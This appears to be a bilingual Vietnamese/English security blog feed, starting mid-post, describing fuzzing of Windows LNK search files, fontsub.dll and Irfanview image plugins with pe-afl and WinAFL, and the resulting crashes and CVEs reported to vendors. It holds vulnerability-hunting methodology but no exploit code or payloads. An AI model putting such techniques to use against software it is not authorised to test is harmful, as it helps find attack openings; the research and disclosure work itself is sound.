Pe-afl sử dụng 1 mảng 65536 bytes để lưu lại coverage đối với 1 module, tôi đã tăng kích thước của mảng này lên gấp đôi để có thể coverage thêm 1 module nữa. Cách này khá đơn giản nhưng ảnh hưởng đến tốc độ chạy của fuzzer rất nhiều. Tôi không biết Dynamorio dùng cách gì để có thể coverage nhiều module 1 lúc nhưng hiện tại thì tôi chỉ có thể sử dụng cách đơn giản này. Tôi sửa pe-afl tối đa có thể coverage được 3 module 1 lúc. Ngoài ra tôi còn tích hợp afl-fast [6] của anh @thuanpv_ và afl-mopt [7] (lấy cảm hứng từ afl++ [8]).



Trên đây là 1 trong 1 số những đoạn code tôi modify pe-afl. Kiểm tra nó hoạt động như thế nào sau khi tôi sửa với afl-showmap:



Bây giờ đã có đủ mọi thứ nhưng cái quan trọng nhất là corpus thì không hề có sẵn. Corpus về định dạng file LNK search không được đề cập ở bất cứ đâu trên internet. Cách duy nhất ở đây là chỉ có thể tự tạo bằng tay. Tôi sử dụng giao diện search của explorer, tạo đủ các trường hợp search theo điều kiện như Date, kind, size, … nhưng cũng chỉ tạo được khoảng hơn 200 files (công việc thật nhàn chán khiến tôi thiếu kiên nhẫn)



Sau đó tôi sử dụng afl-cmin để giảm số lượng corpus xuống và bắt đầu fuzz. Tôi sử dụng pe-afl fuzz trên 2 DLL là windows.storage.search.dll và structuredquery.dll, sau 1 tuần tôi kiểm tra đống crash mà fuzzer tìm được và có 3 unique crash:

-       Stack overflow (0xc00000fd)

-       2 null pointer dereference

 

Cả 3 crash này đều xuất hiện trong structuredquery.dll và có thể gây crash cho explorer.exe

Tôi report cho Microsoft nhưng họ nói rằng những lỗi này chỉ gây ra DOS tạm thời họ sẽ không sửa. Tuy nhiên theo tôi thì do tính chất của file LNK mặc định explorer sẽ luôn tự động xử lý chúng. Với những người dùng bình thường gặp những trường hợp này thường sẽ không rõ nguyên nhân để khắc phục (đơn giản là xóa nó đi nhưng do crash xảy ra liên tục nên sẽ rất khó thao tác).




Conclusion

 

Trên đây là 1 số lỗi tôi tìm thấy đối với định dạng file LNK search, tôi sẽ không public những POC gây DOS này tuy nhiên nếu ai đó đọc blog này và làm theo đều có thể dễ dàng có được những POC đó, thậm chí có thể sẽ tồn tại những lỗi gây ra RCE mà tôi không tìm thấy (tôi nghĩ vẫn còn những lỗi đó tồn tại trong quá trình xử lý file LNK). Người dùng windows nên tự bảo vệ chính mình, không nên tùy tiện tải về những định dạng file như LNK, có thể máy của bạn sẽ bị khai thác ngay sau khi file này được lưu xuống.

 

[1] https://blog.vincss.net/2020/06/cve49-microsoft-windows-lnk-remote-code-execution-vuln-cve-2020-1299-eng.html

[2] https://github.com/wmliang/pe-afl

[3] https://www.zerodayinitiative.com/blog/2020/3/25/cve-2020-0729-remote-code-execution-through-lnk-files

[4] https://www.slideshare.net/wmliang/make-static-instrumentation-great-again-high-performance-fuzzing-for-windows-system

[5] https://www.youtube.com/watch?v=OipNF8v2His

[6] https://github.com/mboehme/aflfast

[7] https://github.com/puppet-meteor/MOpt-AFL

[8] https://github.com/AFLplusplus/AFLplusplus

Microsoft's first bug

By: linhlhq
31 May 2020 at 04:32
Continuing the series on fuzzing, this section I will share how I find attack surfaces on windows to fuzz. On windows handling a lot of file formats, learn and fuzz these file formats are a common way to find bugs on windows today. The approach and fuzz are exactly the same as finding fault in Irfanview I mentioned in the previous section.

Perhaps there are many people who wonder how to find an attack surface? It simply looks like this when you study something long enough, deep enough that you see the possible directions to attack on it. It sounds hard to put this situation in most beginners because not everyone is so good and excellent. But the interesting thing here is that there are so many good researchers who are willing to share everything they research and the bugs they find to the community. Google Project Zero (P0) [1] is an example, I see and track the bugs published on it (including bugs long ago). From there I learned about the types of bugs, surface attacks, components that often cause bugs on different platforms, etc. Or simply monthly I keep track of patches from Microsoft [2] and see if the bugs are patched. What's interesting and suitable for my fuzzing direction or not.

Introduction

Back to talking about fuzz file formats on windows, as we know on windows there are many DLLs, each DLL will have a separate task. For me, for the time being, I will focus on the DLLs that handle file formats. Some common file formats such as media: audio, video, image,... or some other file formats such as XML, XPS, PDF, registry,... These DLLs will export to APIs for developers to use to build the Windows applications, and Windows built-in components also use these APIs.

Microsoft itself has provided us MSDN [3], which is a repository for us to read and learn about using those APIs. Not only has the API document, but Microsoft is also generous in giving us a lot of sample code. I usually refer to the Microsoft GitHub repo [4]. It helps us a lot in building harness to fuzz file formats on windows.

Microsoft Font Subsetting


Windows fonts are a file format that I find very diverse, since the kernel-mode count user-mode has a font processing component. P0 public talks about fuzzing fonts of windows [5] [6], all of them are very clear and quality. In the font-related errors that P0 finds, I pay attention to the fontsub.dll library.



Up to the time of P0 public bugs of this library, no one has previously tried fuzz into the fontsub.dll library.


The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D.


The DLL exports two API functions: CreateFontPackage [7] and MergeFontPackage [8].


unsigned long CreateFontPackage(

  const unsigned char  *puchSrcBuffer,

  const unsigned long  ulSrcBufferSize,

  unsigned char        **ppuchFontPackageBuffer,

  unsigned long        *pulFontPackageBufferSize,

  unsigned long        *pulBytesWritten,

  const unsigned short usFlag,

  const unsigned short usTTCIndex,

  const unsigned short usSubsetFormat,

  const unsigned short usSubsetLanguage,

  const unsigned short usSubsetPlatform,

  const unsigned short usSubsetEncoding,

  const unsigned short *pusSubsetKeepList,

  const unsigned short usSubsetListCount,

  CFP_ALLOCPROC        lpfnAllocate,

  CFP_REALLOCPROC      lpfnReAllocate,

  CFP_FREEPROC         lpfnFree,

  void                 *lpvReserved

);

unsigned long MergeFontPackage(

  const unsigned char  *puchMergeFontBuffer,

  const unsigned long  ulMergeFontBufferSize,

  const unsigned char  *puchFontPackageBuffer,

  const unsigned long  ulFontPackageBufferSize,

  unsigned char        **ppuchDestBuffer,

  unsigned long        *pulDestBufferSize,

  unsigned long        *pulBytesWritten,

  const unsigned short usMode,

  CFP_ALLOCPROC        lpfnAllocate,

  CFP_REALLOCPROC      lpfnReAllocate,

  CFP_FREEPROC         lpfnFree,

  void                 *lpvReserved

);

 


P0 also publishes the harness they built [9], it's very good, covers all the parameters passed to these two functions. I use that harness to fuzz.


In addition to harness, P0 has a public tool that supports TTF/OTF [10] mutate files, this is a tool that I think is the key to help P0 find many bugs with such fonts.


Based on these, I began to find and create copus:

    1. Corpus from P0 public with previously published bugs + download on the internet

    2. Mutate these corpus based on the tool of P0

    3. Use winafl-cmin to reduce the number of corpus

    4. Check coverage

    5. Return to step 2


I do this task over and over again until the coverage I achieve with fontsub.dll is as follows:



With a test case, I can mutate 53.22% on DLL fontsub.dll, 81.08% for CreateFontPackage and 76.40% for MergeFontPackage. I think this is enough to start fuzz.


I used Winafl to run with 1 master and 7 slaves, after a few hours I started seeing the first crashes. After a few days, I went back and started checking for those crashes.


Most of them are stack overflow errors (0xc00000fd):



There are 2 errors that P0 reported earlier that Microsoft did not fix [11] [12].

And there is also a crash which, in my opinion, is quite similar to an error that P0 report earlier that Microsoft has fixed [13].



I report and Microsoft has accepted to fix this. It seems that this is a variant with a bug that Microsoft has fixed before. The bug was fixed in the T4/2020 patch (CVE-2020-0687), this is the root cause analysis of this error I wrote, everyone can read it [14], (In the article you should only pay attention to this error analysis, the impact is not written by me, of course, with errors like this, in fact, can not have a full exploit).


According to the google timeline, the bug fix was fixed in August 2019, but I did fuzz it and the bug persisted until January 2020 (the moment I reported it to Microsoft).


I am not surprised that Microsoft has not completely fixed the bug, but this P0 public project has not been used by anyone to find bugs.


Conclusion


This bug is not hard to find, everything is available in front of you but no one jumped into it. You can see that the steps I showed are clearly presented in the previous article, all the basic knowledge that you do not have to use reverse much to write harness. Microsoft's documentation is very complete, please read it, learn it, and try it out. If I just stopped reading the blog then I think it will not bring much results.


Error when fuzz file format of windows appears less and less. Because this way is quite a lot of users, it requires you to spend a lot of time researching for new surface attacks, file formats that have not been studied in order to be able to spot bugs.


The following blog will talk about a file format bug that Microsoft rewarded me with max bounty in Windows Insider Preview Bounty. Maybe I'll publish it after Microsoft's T6/2020 patch is released or longer.


[1] https://googleprojectzero.blogspot.com/

[2] https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments

[3] https://docs.microsoft.com/en-us/

[4] https://github.com/microsoft/Windows-classic-samples

[5] https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html

[6] https://googleprojectzero.blogspot.com/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html

[7] https://docs.microsoft.com/en-us/windows/win32/api/fontsub/nf-fontsub-createfontpackage

[8] https://docs.microsoft.com/en-us/windows/win32/api/fontsub/nf-fontsub-mergefontpackage

[9] https://github.com/googleprojectzero/BrokenType/tree/master/ttf-fontsub-loader

[10] https://github.com/googleprojectzero/BrokenType/tree/master/ttf-otf-mutator

[11] https://bugs.chromium.org/p/project-zero/issues/detail?id=1863

[12] https://bugs.chromium.org/p/project-zero/issues/detail?id=1866

[13] https://bugs.chromium.org/p/project-zero/issues/detail?id=1868

[14] https://blog.vincss.net/2020/04/cve44-microsoft-font-subsetting-dll-heap-corruption-in-ReadTableIntoStructure-cve-2020-0687.html


-------


Vietnamese version


Tiếp tục seri về fuzzing, phần này tôi sẽ chia sẻ cách tôi tìm kiếm attack surface trên windows để fuzz. Trên windows xử lý rất nhiều định dạng file, tìm hiểu và fuzz các định dạng file này là một hướng phổ biến để tìm được bug trên windows hiện nay. Cách tiếp cận và fuzz hoàn toàn giống như tìm lỗi ở Irfanview tôi đã trình bày ở phần trước.


Có lẽ sẽ có nhiều người tự nhủ làm thế nào mà có thể tìm được attack surface? Đơn giản sẽ như thế này khi bạn nghiên cứu một cái gì đó đủ lâu, đủ sâu bạn sẽ thấy được những hướng có thể tấn công vào nó. Nghe thì thật khó khi đặt tình huống này vào phần lớn người mới bắt đầu vì không phải ai cũng giỏi và xuất sắc như thế. Tuy nhiên có một điều thú vị ở đây là có rất nhiều nhà nghiên cứu giỏi họ sẵn sàng chia sẻ mọi thứ mà họ nghiên cứu cũng như bug họ tìm được cho cộng đồng. Google Project Zero (P0) [1] là một ví dụ, tôi xem và theo dõi các bug được public trên đó (kể cả những bug cách đây rất lâu). Từ đó tôi biết được các loại bug, các attack surface, các thành phần thường gây ra lỗi trên các nền tảng khác nhau,… Hoặc đơn giản hơn hàng tháng tôi vẫn theo dõi các bản vá từ Microsoft [2] và xem các bug được vá có gì thú vị và phù hợp với hướng fuzzing của tôi hay không.


Introduction


Quay trở lại nói về fuzz các định dạng file trên windows, như chúng ta biết trên windows có rất nhiều dll, mỗi dll sẽ có một nhiệm vụ riêng biệt. Đối với tôi, hiện tại tôi sẽ chỉ tập trung vào những DLL có nhiệm vụ xử lý các định dạng file. Một số định dạng file phổ biến như media: audio, video, ảnh,… hoặc một số định dạng file khác như XML, XPS, PDF, registry… Các DLL này sẽ export ra các API cho các developer sử dụng để xây dựng các ứng dụng trên windows, và các thành phần built in của Windows cũng sử dụng những API này.


Bản thân Microsoft đã cung cấp cho chúng ta MSDN [3], đó là một kho tài liệu để ta có thể đọc, tìm hiểu về cách sử dụng các API đó. Không những có document về API mà Microsoft còn hào phóng cho chúng ta rất nhiều code mẫu. Tôi thường tham khảo tại repo github của Microsoft [4]. Nó giúp chúng ta rất nhiều trong việc xây dựng harness để fuzz các định dạng file trên windows.


Microsoft Font Subsetting


Phông chữ của windows là một định dạng file tôi thấy rất đa dạng, từ usermode đếm kernelmode đều có thành phần xử lý phông chữ. P0 public rất nhiều bài nói về fuzzing phông chữ của windows [5] [6], những bài đó đều rất rõ ràng và chất lượng. Trong các lỗi liên quan đến phông chữ mà P0 tìm ra, tôi chú ý đến thư viện fontsub.dll.



Tính tới thời điểm P0 public các lỗi của thư viện này thì trước đó chưa có ai thử fuzz vào thư viện fontsub.dll. 


Fontub.dll là một thư viện tạo, gom nhóm các phông chữ TTF, nó có thể chuyển đổi phông chữ thành các phiên bản nhỏ gọn hơn dựa trên các glyph và được sử dụng trong các file tài liệu như docx, ppt, pdf,… có phông chữ được nhúng. Nó cũng được Windows GDI và Direct2D sử dụng.


DLL export hai hàm API: CreateFontPackage [7] và MergeFontPackage [8].


unsigned long CreateFontPackage(

  const unsigned char  *puchSrcBuffer,

  const unsigned long  ulSrcBufferSize,

  unsigned char        **ppuchFontPackageBuffer,

  unsigned long        *pulFontPackageBufferSize,

  unsigned long        *pulBytesWritten,

  const unsigned short usFlag,

  const unsigned short usTTCIndex,

  const unsigned short usSubsetFormat,

  const unsigned short usSubsetLanguage,

  const unsigned short usSubsetPlatform,

  const unsigned short usSubsetEncoding,

  const unsigned short *pusSubsetKeepList,

  const unsigned short usSubsetListCount,

  CFP_ALLOCPROC        lpfnAllocate,

  CFP_REALLOCPROC      lpfnReAllocate,

  CFP_FREEPROC         lpfnFree,

  void                 *lpvReserved

);

unsigned long MergeFontPackage(

  const unsigned char  *puchMergeFontBuffer,

  const unsigned long  ulMergeFontBufferSize,

  const unsigned char  *puchFontPackageBuffer,

  const unsigned long  ulFontPackageBufferSize,

  unsigned char        **ppuchDestBuffer,

  unsigned long        *pulDestBufferSize,

  unsigned long        *pulBytesWritten,

  const unsigned short usMode,

  CFP_ALLOCPROC        lpfnAllocate,

  CFP_REALLOCPROC      lpfnReAllocate,

  CFP_FREEPROC         lpfnFree,

  void                 *lpvReserved

);

 


P0 cũng public cả harness mà họ xây dựng [9], nó rất tốt, cover được hết tất cả các tham số được truyền vào 2 hàm này. Tôi sử dụng harness đó để fuzz.

 

Ngoài harness, P0 còn public tool hỗ trợ mutate file TTF/OTF [10], đây là một tool tôi nghĩ nó là chìa khóa giúp P0 có thể tìm được nhiều lỗi với phông chữ như thế.

 

Dựa vào những thứ đó, tôi bắt đầu tìm và tạo copus:

1. Corpus từ P0 public kèm các lỗi đã public từ trước + download trên internet

2. Mutate các corpus này dựa theo tool của P0

3. Dùng winafl-cmin để giảm số lượng corpus xuống

4. Kiểm tra coverage

5. Quay lại bước 2

 

Tôi làm công việc này lặp đi lặp lại đến khi coverage tôi đạt được với fontsub.dll như say:



Với 1 testcase tôi mutate ra có thể đạt 53.22% trên DLL fontsub.dll, 81.08% đối với hàm CreateFontPackage và 76.40% đối với hàm MergeFontPackage. Tôi nghĩ thế này là đủ để có thể bắt đầu fuzz.

 

Tôi sử dụng winafl chạy với 1 master và 7 slave, sau một vài tiếng tôi bắt đầu thấy các crash đầu tiên. Sau một vài ngày tôi quay lại và bắt đầu kiểm tra các crash đó.

Phần lớn đều là lỗi stack overflow (0xc00000fd):



Xuất hiện 2 lỗi mà P0 report trước đó mà Microsoft không fix [11][12].

Và còn xuất hiện 1 crash mà theo tôi thấy thì khá giống với một lỗi mà P0 report trước đó mà Microsoft đã fix [13].



Tôi report và Microsoft đã chấp nhận sửa lỗi này. Có vẻ đây là một biến thể với lỗi mà Microsoft đã fix trước đó. Lỗi được sửa trong bản vá T4/2020 (CVE-2020-0687), đây là bài phân tích root cause của lỗi này tôi viết, mọi người có thể đọc thử [14] (trong bài viết bạn chỉ nên chú ý phần phân tích lỗi này, phần impact không phải do tôi tự viết, tất nhiên với những lỗi như thế này trong thực tế không thể có 1 full exploit).

 

Theo timeline google đưa ra bug này đã được fix vào tháng 8/2019, tuy nhiên tôi đã fuzz bản vá đó và lỗi đó vẫn tồn tại đến tận T1/2020 (thời điểm tôi report cho Microsoft).

 

Tôi không bất ngờ về việc Microsoft fix không hết bug, mà P0 public project này từ rất lâu rồi mà không hề có ai đó thử sử dụng để tìm bug.

 

Conclusion

 

Bug này không phải là khó tìm, mọi thứ đều ở sẵn trước mặt nhưng lại không có ai nhảy vào làm. Bạn có thể thấy các bước tôi làm đều trình bày rõ ở trong bài viết trước, đều là các kiến thức cơ bản bạn chưa phải sử dụng reverse nhiều để có thể viết được harness. Document của Microsoft rất đầy đủ, hãy chịu khó đọc, tìm hiểu và bắt tay vào làm thử. Nếu chỉ dừng lại ở việc đọc blog thì tôi nghĩ sẽ không mang lại nhiều kết quả.

 

Các lỗi khi fuzz định dạng file của windows xuất hiện càng ngày càng ít. Do cách này khá nhiều người sử dụng, đòi hỏi bạn phải bỏ nhiều thời gian để nghiên cứu tìm các attack surface mới, các định dạng file chưa ai nghiên cứu thì mới có thể ra được bug.

 

Blog sau tôi sẽ nói về bug của một định dạng file mà Microsoft đã thưởng cho tôi max bounty ở Windows Insider Preview Bounty. Có lẽ tôi sẽ public nó sau khi bản vá T6/2020 của Microsoft được release hoặc lâu hơn nữa.


[1] https://googleprojectzero.blogspot.com/

[2] https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments

[3] https://docs.microsoft.com/en-us/

[4] https://github.com/microsoft/Windows-classic-samples

[5] https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html

[6] https://googleprojectzero.blogspot.com/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html

[7] https://docs.microsoft.com/en-us/windows/win32/api/fontsub/nf-fontsub-createfontpackage

[8] https://docs.microsoft.com/en-us/windows/win32/api/fontsub/nf-fontsub-mergefontpackage

[9] https://github.com/googleprojectzero/BrokenType/tree/master/ttf-fontsub-loader

[10] https://github.com/googleprojectzero/BrokenType/tree/master/ttf-otf-mutator

[11] https://bugs.chromium.org/p/project-zero/issues/detail?id=1863

[12] https://bugs.chromium.org/p/project-zero/issues/detail?id=1866

[13] https://bugs.chromium.org/p/project-zero/issues/detail?id=1868

[14] https://blog.vincss.net/2020/04/cve44-microsoft-font-subsetting-dll-heap-corruption-in-ReadTableIntoStructure-cve-2020-0687.html

Start fuzzing, Fuzz various image viewers

By: linhlhq
24 May 2020 at 08:16

I will return to writing about what I have done in the past year, it has been 2 years since I came back to the blog. This article I will share the fuzzing experience I have learned through the process of using common fuzzer to find bug in non-source products. The environment I learn is Windows, the fuzzer I usually use is targeted at products on this environment. In this article, I will use a popular fuzzer called Winafl to find errors in popular image viewers such as Irfanview [1], Fast Stone [2], Xnview [3], etc.


Introduction


I will not elaborate on Winafl's architecture, nor how to use it. I will leave some links [4] [5] mentioning these issues at the end of the article, anyone interested can read it.


Why did I choose Image Viewers to approach fuzz? We can say file format fuzzing is a fuzzing direction is almost the most popular today. It takes little time to prepare, accessible, easy to find corpus (depending on the case),... and maybe logic parsing these file formats still have very high errors.


Here I will take an example of Irfanview, how I approach and use fuzzer to find errors parsing Irfanview image formats.


Reverse and understand


We can see Irfanview handles many image file formats. Some formats will be handled in the i_view32.exe program, some other file formats will be handled through plugins deployed through DLLs.


We need to understand how the flow of image files is pushed in. The reverse process to understand that logic is quick or slow, difficult, or easy depending on the complexity of each program. With complex programs, it will take a lot of time.


However in this case I will use DynamoRIO [6] (a tool used to calculate the coverage of the program when it executes) to support my reverse faster.


Using DynamoRIO with IDA's lighthouse plugin [7], we can tell with input how the program will go, what code to execute. Save a lot of time when reversing.


For example, when Irfanview processes a jpeg2000 image format, the command runs drrun.exe to generate file coverage:

drrun.exe -t drcov -- i_view32.exe _00042.j2k

With this command, DynamoRIO will generate a file containing information about the loaded DLLs and coverage of the program and each DLL file.


Here is an example output file coverage:



We can see the JPEG2000.dll DLL is loaded during the processing of _00042.j2k file.


Now use the lighthouse plugin on IDA to see the results. We can see that the commands highlighted in green are the ones that were executed when i_view32.exe processed the _00042.j2k file.



From there we will trace back the jpeg2000 image processing functions, by finding the related strings is the fastest and most effective way I often use. We can see that i_view32.exe will load library JPEG2000.dll and then call ReadJPG2000_W() function to process the jpeg2000 file.


Let's debug to see the parameters passed into the ReadJPG2000_W() function, we set the breakpoint at the address calling the ReadJPG2000_W() function:

According to the status of the stack at the time the ReadJPG2000_W() function is called, the parameters passed to the function are as follows:

- wchar_t *argv1: the name of the jpeg2000 file needs to be processed.

- int argv2: variable store value 0.

- wchar_t *argv3: a memory of size 2048.

- wchar_t *argv4: a memory of size 2048, initialized by the string "None".

- int argv5, argv6: used to save parameters while parsing jpeg2000 file.


It is very simple, it is possible to build a harness that calls this function and pass the above parameters to parsing a jpeg2000 image file. Because these parameters are completely independent from the program i_view32.exe.


Here is the harness that I wrote:



Run harness with input jpeg2000 file and check its coverage on JPEG2000.dll

Great, it works properly with i_view32.exe's jpeg2000 processing stream.

With this harness we will be able to use it for fuzzing. I use corpus on the GitHub repo:

 - openjpeg

 - go-fuzz-corpus

 - and some corpus from previous fuzz projects.

With lighthouse, we can also see coverage of each function in DLL.


Herewith the file I use the coverage of the ReadJPG2000_W function is only about 34%, of course, this figure is not ideal when fuzz, you need to find a corpus to push this number as high as possible.


Use Winafl to fuzz jpeg2000 with the harness I built above:


Looking at the interface Winafl we should be interested in some of the following parameters:

- exec speed: the number of test cases that can be executed on 1s

- stability: this indicator shows stability during fuzzing. When running Winafl there will be a certain number of iterations on that test case, in theory, the iterations on the same test case the coverage value must not be changed. If this value changes, the stability will not be high.

- map density: this parameter shows the coverage of the target when running with the current test case.


These three parameters must be high to be effective when the fuzz is high [4].


For other image file formats, Irfanview is treated the same as jpeg2000. The plugin responsible for parsing image files has the same functions for processing. In addition to fuzz jpeg2000 file format I also tried with other formats such as gif, dicom, djvu, ani, dpx, wbmp, webp, ...


Results: CVE-2019-17241, CVE-2019-17242, CVE-2019-17243, CVE-2019-17244, CVE-2019-17245, CVE-2019-17246, CVE-2019-17247, CVE-2019-17248 , CVE-2019-17249, CVE-2019-17250, CVE-2019-17251, CVE-2019-17252, CVE-2019-17253, CVE-2019-17254, CVE-2019-17255, CVE-2019-17256, CVE -2019-17257, CVE-2019-17258, CVE-2019-17259, CVE-2019-17261, CVE-2019-17262


Tips and Tricks


While using Winafl, I found Winafl to be most stable on Windows 7. Windows 10 is very bad, DynamoRIO has some problems with memory on Windows 10 that leads to fuzzer or crash.


When fuzzing, I recommend turning on the Page Heap for the harness, to better detect out-of-bounds and uninitialized memory errors.


Afl-tmin is a useful tool to help you minimize corpus, which will be very helpful with fuzzer during mutate corpus. However I usually do not use it because it is too slow. I think I will try using the halfempty tool [8] to replace afl-tmin in the future.


Speed ​​up: Harness is used to call the Windows API the less DynamoRIO instrument process faster. In the harness I wrote above, in the main function I use the LoadLibraryA function to load the DLL I need fuzz and my target_offset in the main function, it will greatly reduce the running speed of the fuzzer.


There are many workarounds. There are a few ways that I can read and read [9], changing the offset to start the instrument is quite good, but when using this method I check it when run in debug mode with iterator, my fuzzer is unstable, I Do not know why. Here, I use lief [10] to solve this problem. I will load the library I need to fuzz before executing the main function:


                
And this is the result, after this fuzz target, has been fixed my way:

                

Speed has improved, but this is not the best way because the speed depends on the target that you fuzz not only depends on the harness you build. I use it because on Windows there is one more fuzzer, but later I prefer to use it instead of Winafl, the way my library loads before the main function matches the architecture of that fuzzer. The following article I will mention more about that fuzzer more.


Corpus: Many people who are new to fuzz will often think of the most important and hardest to build a harness. For me, searching for corpus is the most difficult problem. Searching for corpus with high coverage is very rare, and with these corpus people often will not share because it is very valuable with fuzzing.


When finding a large corpus you should use winafl-cmin to reduce the number of test cases down. There will be test cases whose coverage is duplicated or included in other test cases.


Conclusion


This is the first target I use to learn fuzzing. When my bugs were submitted and got CVE, there were some who said that I farmed and was CVE grass. I also don't argue with those people, I just care what I do, what I will learn from it. Continuing this series on fuzzing, I will share how I approach and fuzz out the bugs of VMWare, Microsoft,... based on what I said in this article.


[3] https://www.xnview.com/en/

[4] https://www.apriorit.com/dev-blog/644-reverse-vulnerabilities-software-no-code-dynamic-fuzzing

[5] https://symeonp.github.io/2017/09/17/fuzzing-winafl.html

[6] https://github.com/DynamoRIO/dynamorio

[7] https://github.com/gaasedelen/lighthouse

[8] https://github.com/googleprojectzero/halfempty

[9] https://github.com/googleprojectzero/winafl/issues/4

[10] https://github.com/lief-project/LIEF




Vietnamese version


Tôi sẽ quay lại viết lách về những gì mình làm được trong năm vừa qua, cũng đã 2 năm rồi tôi mới quay lại viết blog. Bài viết này tôi sẽ chia sẽ những kinh nghiệm fuzzing mà tôi đúc kết được qua quá trình sử dụng các fuzzer phổ biến để tìm lỗi trong các sản phẩm không có mã nguồn. Môi trường tôi tìm hiểu là Windows, fuzzer tôi thường sử dụng đều target vào các sản phẩm trên môi trường này. Trong bài viết này tôi sẽ dụng một fuzzer phổ biến là Winafl để tìm các lỗi trong các trình image viewers phổ biến như Irfanview [1], Fast Stone [2], Xnview [3],…


Introduction


Tôi sẽ không trình bày quá kĩ về kiến trúc của Winafl, cũng như cách sử dụng nó. Tôi sẽ để 1 số link [4] [5] đề cập đến những vấn đề này ở cuối bài viết, ai quan tâm có thể đọc thử.


Tại sao tôi lại chọn các trình Image Viewers để tiếp cận fuzz. Có thể nói file format fuzzing là một hướng fuzzing gần như là phổ biến nhất hiện nay. Nó mất ít thời gian để chuẩn bị, dễ tiếp cận, dễ tìm corpus (tùy trường hợp),… và có thể logic parsing các định dạng file này vẫn còn tồn tại lỗi rất cao.


Ở đây tôi sẽ lấy ví dụ về Irfanview, cách tôi tiếp cận, sử dụng fuzzer như thế nào để tìm lỗi parsing các định dạng ảnh của Irfanview.


Reverse and understand


Ta có thể thấy Irfanview xử lý rất nhiều định dạng file ảnh. Một số định dạng sẽ được xử lý trong chương trình i_view32.exe, một số định dạng file khác được xử lý qua các plugin được triển khai qua các DLL.


yyyyy

Ta cần hiểu luồng xử lý các file ảnh được đẩy vào như thế nào. Quá trình reverse để hiểu logic đó nhanh hay chậm, khó hay dễ phụ thuộc vào độ phức tạp của từng chương trình. Với những chương trình phức tạp ta sẽ mất khá nhiều thời gian.


Tuy nhiên trong trường hợp này mình sẽ sử dụng DynamoRIO [6] (1 tool được sử dụng để tính coverage của chương trình khi nó thực thi) để hỗ trợ cho việc reverse của mình nhanh hơn.


Sử dụng DynamoRIO kèm plugin lighthouse [7] của IDA, chúng ta có thể biết được với input như thế chương trình sẽ đi như thế nào, sẽ thực thi những dòng lệnh nào. Tiết kiệm một lượng lớn thời gian khi reverse.


Ta lấy ví dụ khi Irfanview xử lý 1 định dạng ảnh jpeg2000, Lệnh chạy drrun để generate ra file coverage:

drrun.exe -t drcov -- i_view32.exe _00042.j2k

Với lệnh này DynamoRIO sẽ sinh ra 1 file chứa thông tin các DLL được load và coverage của chương trình và từng file DLL đó.

Dưới đây là output file coverage ví dụ:


Ta có thể thấy DLL JPEG2000.dll được load vào trong quá trình xử lý file _00042.j2k.

 

Bây giờ hãy sử dụng plugin lighthouse trên IDA để xem kết quả. Ta có thể thấy các lệnh được bôi xanh là những lệnh đã được thực thi khi i_view32.exe xử lý file _00042.j2k.


Từ đó ta sẽ trace ngược về các hàm xử lý ảnh jpeg2000, bằng việc find các string liên quan là cách hiệu quả và nhanh nhất mà tôi thường dùng. Ta có thể thấy i_view32.exe sẽ load library JPEG2000.dll sau đó gọi hàm ReadJPG2000_W() để xử lý file jpeg2000.



Hãy debug để xem các tham số truyền vào hàm ReadJPG2000_W(), ta đặt breakpoint tại địa chỉ gọi hàm ReadJPG2000_W():



Theo trạng thái của stack vào thời điểm function ReadJPG2000_W() được gọi, thì các tham số truyền vào hàm lần lượt như sau:

- wchar_t *argv1: tên của file jpeg2000 cần được xử lý

- int argv2: biến lưu giá trị 0

- wchar_t *argv3: một vùng nhớ có kích thước 2048

- wchar_t *argv4: một vùng nhớ có kích thước 2048, được khởi tạo bởi chuỗi None

- int argv5, argv6: dùng để lưu các thông số trong khi parsing file jpeg2000.


Nó rất đơn giản, ta hoàn toàn có thể xây dựng 1 harness gọi hàm này và truyền các tham số như trên để parsing 1 file ảnh jpeg2000. Vì các tham số này hoàn toàn độc lập so với chương trình i_view32.exe.

Dưới đây là harness mà tôi viết:



Chạy thử harness với input là file jpeg2000 và kiểm tra coverage của nó trên JPEG2000.dll



Tuyệt với nó hoạt động đúng với luồng xử lý jpeg2000 của i_view32.exe.

 

Với harness này ta sẽ có thể sử dụng để fuzzing. Tôi sử dụng corpus trên các repo github:

- Openjpeg

- go-fuzz-corpus

- và 1 số corpus từ các project tôi fuzz trước đó.

Với lighthouse chúng ta còn có thể xem coverage của từng hàm trong DLL.



Ở đây với file tôi sử dụng coverage của hàm ReadJPG2000_W chỉ đạt khoảng 34%, tất nhiên con số này là không lý tưởng khi fuzz, bạn cần tìm các corpus để đẩy con số này lên càng cao càng tốt.

 

Sử dụng Winafl để fuzz jpeg2000 với harness tôi xây dựng ở trên:



Nhìn vào giao diện Winafl chúng ta nên quan tâm 1 số thông số sau:

- exec speed: số testcase thực thi được trên 1s

- stability: chỉ số này thể hiện độ ổn định trong khi fuzzing. Khi thực hiện chạy Winafl sẽ có 1 số lần lặp nhất định trên testcase đó, về lý thuyết thì các lần lặp trên cùng 1 testcase giá trị coverage không được thay đổi. Nếu giá trị này thay đổi dẫn đến độ ổn định sẽ không cao.

-  map density: thông số này thể hiện coverage của target khi run với testcase hiện tại.

3 thông số này phải cao thì hiệu quả khi fuzz mới cao [4].

 

Đối với các định dạng file ảnh khác, irfanview đều xử lý tương tự như jpeg2000. Các plugin phụ trách parsing các file ảnh đều có các hàm tương tự để xử lý. Ngoài fuzz định dạng file jpeg2000 tôi còn thử với các định dạng khác như: gif, dicom, djvu, ani, dpx, wbmp, webp,…

 

Kết quả: CVE-2019-17241, CVE-2019-17242, CVE-2019-17243, CVE-2019-17244, CVE-2019-17245, CVE-2019-17246, CVE-2019-17247, CVE-2019-17248, CVE-2019-17249, CVE-2019-17250, CVE-2019-17251, CVE-2019-17252, CVE-2019-17253, CVE-2019-17254, CVE-2019-17255, CVE-2019-17256, CVE-2019-17257, CVE-2019-17258, CVE-2019-17259, CVE-2019-17261, CVE-2019-17262

 

Tips and Tricks


